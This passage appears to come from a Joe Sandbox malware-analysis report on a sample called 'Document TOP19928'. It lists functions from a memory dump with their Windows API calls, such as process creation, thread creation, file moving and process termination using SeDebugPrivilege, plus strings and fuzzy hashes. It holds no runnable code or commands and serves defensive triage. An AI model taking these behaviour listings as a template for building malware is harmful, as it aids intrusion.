Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c60cdb821e5824ac4f53f3656ff06fd54f39917f6c255493842787c4eb47a8f6
Instruction ID: 01f56eda89608406369e582ca4adbfe6eaceee78cc528d38d9940389e4254967
Opcode Fuzzy Hash: c60cdb821e5824ac4f53f3656ff06fd54f39917f6c255493842787c4eb47a8f6
Instruction Fuzzy Hash: 2271F431500205EFCF219FA4CC84ABA7BB6FF48350F18426AED559A2A6D7358C52DF61

Function 0084F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0084F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0084FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0084FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0084FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0084FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0084FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0084FD90
CloseHandle.KERNEL32(?), ref: 0084FDBF
CloseHandle.KERNEL32(?), ref: 0084FE36

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 323e83bed68beea83d26648e1a3b3eefc012ad6db68f0a7a44c2aeea3275f554
Instruction ID: f2e214716fa2670abe2e9aeaf7ef359ea9e508df02cc25f794dd8b9cb5cb00c6
Opcode Fuzzy Hash: 323e83bed68beea83d26648e1a3b3eefc012ad6db68f0a7a44c2aeea3275f554
Instruction Fuzzy Hash: 47E1AD31204255DFCB14EF24C895A6ABBE0FF85314F14886DFA998B3A2DB35EC44CB52

Function 007D201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007D2036,?,00000000,?,?,?,?,007D16CB,00000000,?), ref: 007D1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007D20D3
KillTimer.USER32(-00000001,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 007D216E
DestroyAcceleratorTable.USER32(00000000), ref: 0080BEF6
DeleteObject.GDI32(00000000), ref: 0080BF6C

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: 8822d3ba99f47d5702953ad81d3314b127cc7b8f83dc76dff67f3f3a62af63e9
Instruction ID: 8244b316f42be456514b223c35f18278e285f9f1435798b140abfe2237a8d517
Opcode Fuzzy Hash: 8822d3ba99f47d5702953ad81d3314b127cc7b8f83dc76dff67f3f3a62af63e9
Instruction Fuzzy Hash: 11619D31100701EFCB35AF14DD48B2AB7F1FF64316F18852AE54297AA2DB79A892DF50

Function 00834F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008338D3,?), ref: 008348C7

Part of subcall function 008348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008338D3,?), ref: 008348E0

Part of subcall function 00834CD3: GetFileAttributesW.KERNEL32(?,00833947), ref: 00834CD4

lstrcmpiW.KERNEL32(?,?), ref: 00834FE2
_wcscmp.LIBCMT ref: 00834FFC
MoveFileW.KERNEL32(?,?), ref: 00835017

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 9ccf0ea0b52e901a6947c91a5707b195d104113d6687982df0d71f5b4ef41747
Instruction ID: 7dff7aaeb6ba89f560b0a1fcaab2a494d1b321e86da9d3ef83a80398e1b29c3c
Opcode Fuzzy Hash: 9ccf0ea0b52e901a6947c91a5707b195d104113d6687982df0d71f5b4ef41747
Instruction Fuzzy Hash: 145174B20087859BC724DB54C8859DFB7ECEFC4301F10492EB285D3152EF75A689C7A6

Function 008588B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0085896E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: ea507cb398c1181a8817a14f86f1bb6a843f6d0b216cb5f454af3f36b11c1be3
Instruction ID: 3f4511c8577c5e2a490385e4878866072edc81e39021a839576171ca6cc3f279
Opcode Fuzzy Hash: ea507cb398c1181a8817a14f86f1bb6a843f6d0b216cb5f454af3f36b11c1be3
Instruction Fuzzy Hash: 0E51B330600218FFDF219F28CC89B693B65FB05356F644163FD11F66A1DF75A9988B82

Function 007D2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0080C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0080C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0080C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0080C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0080C5C0
DestroyCursor.USER32(00000000), ref: 0080C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0080C5EC
DestroyCursor.USER32(?), ref: 0080C5FB

Part of subcall function 0085A71E: DeleteObject.GDI32(00000000), ref: 0085A757

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2975913752-0
Opcode ID: 023b1b457b6a8568c46ab3a575c8bd1f9f73354271d0ff0b473364974dc4fcb9
Instruction ID: 1fe5eda0039e75376a3580fa17dd0378736ce9c36afea4351247f55a114c6406
Opcode Fuzzy Hash: 023b1b457b6a8568c46ab3a575c8bd1f9f73354271d0ff0b473364974dc4fcb9
Instruction Fuzzy Hash: 43516B74610205AFDB24DF24CC45BAA77B5FB68351F10062AF902E72E1E774ED92DB60

Function 00828E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00828A84,00000B00,?,?), ref: 00828E0C
RtlAllocateHeap.NTDLL(00000000,?,00828A84), ref: 00828E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00828A84,00000B00,?,?), ref: 00828E28
GetCurrentProcess.KERNEL32(?,00000000,?,00828A84,00000B00,?,?), ref: 00828E30
DuplicateHandle.KERNEL32(00000000,?,00828A84,00000B00,?,?), ref: 00828E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00828A84,00000B00,?,?), ref: 00828E43
GetCurrentProcess.KERNEL32(00828A84,00000000,?,00828A84,00000B00,?,?), ref: 00828E4B
DuplicateHandle.KERNEL32(00000000,?,00828A84,00000B00,?,?), ref: 00828E4E
CreateThread.KERNEL32(00000000,00000000,00828E74,00000000,00000000,00000000), ref: 00828E68

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
String ID:
API String ID: 1422014791-0
Opcode ID: 8715703a80da6191356ac55ec18045e082e1d3853fe474158a8987351531d8f6
Instruction ID: 76f905c37e91e7db5ee66103a2751e87faf30526692bf8654746a5e3307974c1
Opcode Fuzzy Hash: 8715703a80da6191356ac55ec18045e082e1d3853fe474158a8987351531d8f6
Instruction Fuzzy Hash: 0E01ACB5680704FFE611AB65DC49F5B3B6CFB89711F414421FA05DB191CA7498048A20

Function 00849428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0084947C
VariantInit.OLEAUT32(?), ref: 0084954D
VariantInit.OLEAUT32(?), ref: 0084964E
VariantClear.OLEAUT32(?), ref: 00849658
VariantClear.OLEAUT32(?), ref: 008496B5

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00849631
Null Object assignment in FOR..IN loop, xrefs: 008494DD, 0084960B, 008496C3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 11e59f235224d05f920ea7d8cfdd66ec1cf85d0d7dbde767b0345dc5e60b2ec6
Instruction ID: 1c58233479757792cf0d3533addfebd92b0dfbf7f6d90b0e4c1db99d72f93b07
Opcode Fuzzy Hash: 11e59f235224d05f920ea7d8cfdd66ec1cf85d0d7dbde767b0345dc5e60b2ec6
Instruction Fuzzy Hash: 9991AA70A00219ABDF34DFA4C848FAFBBB8FF95314F11815AE559EB280D7749905CBA0

Function 00856FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00857093
SendMessageW.USER32(?,00001036,00000000,?), ref: 008570A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008570C1
_wcscat.LIBCMT ref: 0085711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00857133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00857161

Strings

SysListView32, xrefs: 00857065

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: b8807a405c1f28b38d451301161bde7179af6c4879cb3cf49ec0323015c67b5e
Instruction ID: aaf41072ae29b70a1aedc41a4cae18ede66da5c7926b9ff6c8b4c10ae572a706
Opcode Fuzzy Hash: b8807a405c1f28b38d451301161bde7179af6c4879cb3cf49ec0323015c67b5e
Instruction Fuzzy Hash: D941A270A44308ABEB219FA4DC89BEA77E8FF08351F10452AF944E72D2D6759D888B50

Function 0084EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00833E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00833EB6
Part of subcall function 00833E91: Process32FirstW.KERNEL32(00000000,?), ref: 00833EC4
Part of subcall function 00833E91: CloseHandle.KERNEL32(00000000), ref: 00833F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0084ECB8
GetLastError.KERNEL32 ref: 0084ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0084ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 0084ED77
GetLastError.KERNEL32(00000000), ref: 0084ED82
CloseHandle.KERNEL32(00000000), ref: 0084EDB7

Strings

SeDebugPrivilege, xrefs: 0084ECD6

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 8c6dc62fd22794d3d3eac742f1e9932f821e78b07e45bb596b4649fb24872bb2
Instruction ID: b13c14c0b29bd20041c531cff80a199481556c32409dbbfaf23059bdd886bde8
Opcode Fuzzy Hash: 8c6dc62fd22794d3d3eac742f1e9932f821e78b07e45bb596b4649fb24872bb2
Instruction Fuzzy Hash: 9F41BB316002149FDB14EF28CC99FAEB7A0FF84714F088059F9429B3D2DB78A804CB96

Function 00833226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 008332C5

Strings

blank, xrefs: 00833247
question, xrefs: 0083327E
info, xrefs: 00833266
warning, xrefs: 008332AE
stop, xrefs: 00833296

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f2100ceb34655cec2b7684d00a0531135cb75513cb26d7366e790d3beca2c18f
Instruction ID: 0a0101b03a701b0afb99bf2348be7936e067d4147dfd60858acc7614b8ad0f55
Opcode Fuzzy Hash: f2100ceb34655cec2b7684d00a0531135cb75513cb26d7366e790d3beca2c18f
Instruction Fuzzy Hash: 0B11273120834EBAE7056A54DC42C6BB39CFF59376F20002AF605E62C2E7AD5B4046F5

Function 00848BC0 Relevance: 12.3, APIs: 8, Instructions: 324COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00848BEC
CoInitialize.OLE32(00000000), ref: 00848C19
GetRunningObjectTable.OLE32(00000000,?), ref: 00848D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00848E50
CoGetObject.OLE32(?,00000000,00862C0C,?), ref: 00848EA7
SetErrorMode.KERNEL32(00000000), ref: 00848EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00848F3A
VariantClear.OLEAUT32(?), ref: 00848F4A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
String ID:
API String ID: 2437601815-0
Opcode ID: ecf8e234ab362aa333675554cc57bdb3cb338d582640efdad26313569aeb606a
Instruction ID: bbe529599a56a6cc5a0b0cfd039e3cbaaf4442f1cd40fd89623a9da37936bbc9
Opcode Fuzzy Hash: ecf8e234ab362aa333675554cc57bdb3cb338d582640efdad26313569aeb606a
Instruction Fuzzy Hash: 3DC1DFB1608309EFD700EF68C88492AB7E9FF89748F00496DF58ADB251DB71ED058B52

Function 00834534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0083454E
LoadStringW.USER32(00000000), ref: 00834555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0083456B
LoadStringW.USER32(00000000), ref: 00834572
_wprintf.LIBCMT ref: 00834598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 008345B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00834593

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 47421bf127f25a1a43813f12a06f9fd17911b48128eb913f3fea18ad4252e721
Instruction ID: f8964aa4fb55cfc96ce74206bc021633da886229f5d31085a9882cd0dbe651d4
Opcode Fuzzy Hash: 47421bf127f25a1a43813f12a06f9fd17911b48128eb913f3fea18ad4252e721
Instruction Fuzzy Hash: 940167F2900308BFE711A794DD89EF7776CFB08301F0005A5BB45D2152EA785E858B70

Function 007D2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0080C417,00000004,00000000,00000000,00000000), ref: 007D2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0080C417,00000004,00000000,00000000,00000000,000000FF), ref: 007D2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0080C417,00000004,00000000,00000000,00000000), ref: 0080C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0080C417,00000004,00000000,00000000,00000000), ref: 0080C4D6

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: f270ac3b75a77d5b30eddb39ca2409d53784a3c4850927ae79ba7330d5b08b82
Instruction ID: c393e588d357b2f86f63c7154ed8744ef4b2a281e9a611d6265d31bb6a9d0486
Opcode Fuzzy Hash: f270ac3b75a77d5b30eddb39ca2409d53784a3c4850927ae79ba7330d5b08b82
Instruction Fuzzy Hash: CE41E730304780AAC7759B288C9CA7A7BB2FBE5300F58C51BE947867A3D67D9843D710

Function 00837368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0083737F

Part of subcall function 007F0FF6: std::exception::exception.LIBCMT ref: 007F102C
Part of subcall function 007F0FF6: __CxxThrowException@8.LIBCMT ref: 007F1041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008373B6
RtlEnterCriticalSection.NTDLL(?), ref: 008373D2
_memmove.LIBCMT ref: 00837420
_memmove.LIBCMT ref: 0083743D
RtlLeaveCriticalSection.NTDLL(?), ref: 0083744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00837461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00837480

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
